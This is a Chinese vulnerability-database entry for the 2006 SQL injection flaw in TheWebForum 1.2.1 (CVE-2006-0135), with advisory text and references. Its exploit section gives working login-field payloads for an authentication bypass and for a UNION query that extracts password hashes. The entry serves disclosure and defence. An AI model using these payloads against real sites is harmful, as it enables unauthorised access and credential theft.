TheWebForum多个输入验证漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109596 漏洞类型 SQL注入
发布时间 2006-01-06 更新时间 2006-01-15
CVE编号 CVE-2006-0135 CNNVD-ID CNNVD-200601-058
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/27037
https://cxsecurity.com/issue/WLB-2006010013
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200601-058
|漏洞详情
TheWebForum(twf)1.2.1的login.php中存在SQL注入漏洞,远程攻击者可以通过用户名参数(也称为u变量)执行任意SQL命令并绕过登录认证。
|漏洞EXP
source: http://www.securityfocus.com/bid/16161/info

TheWebForum is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.

Successful exploitation of these vulnerabilities could result in a compromise of the application, disclosure or modification of data, the theft of cookie-based authentication credentials and allow an attacker to control how the site is rendered to the user. They may also permit an attacker to exploit vulnerabilities in the underlying database implementation as well as other attacks. 

Authentication bypass example (SQL Injection):
http://www.example.com/twf/login.php
User Name: a' or 'a'='a'/*
Password: anypassword

Get user's password hash example (SQL Injection):
http://www.example.com/twf/login.php
User Name: a' union select N,password, 3 from users/*
User name will contain password's hash of user with ID=N
|参考资料

来源:BID
名称:16161
链接:http://www.securityfocus.com/bid/16161
来源:BUGTRAQ
名称:20060106[eVuln]TheWebForumScriptInsertionandAuthenticationBypass
链接:http://www.securityfocus.com/archive/1/archive/1/421039/100/0/threaded
来源:VUPEN
名称:ADV-2006-0093
链接:http://www.frsirt.com/english/advisories/2006/0093
来源:SECTRACK
名称:1015450
链接:http://securitytracker.com/id?1015450
来源:SECUNIA
名称:18392
链接:http://secunia.com/advisories/18392
来源:MISC
链接:http://evuln.com/vulns/17/summary.html
来源:MISC
链接:http://evuln.com/vulns/17/exploit.html
来源:XF
名称:thewebforum-login-sql-injection(24027)
链接:http://xforce.iss.net/xforce/xfdb/24027
来源:OSVDB
名称:22294
链接:http://www.osvdb.org/22294
来源:SREASON
名称:321
链接:http://securityreason.com/securityalert/321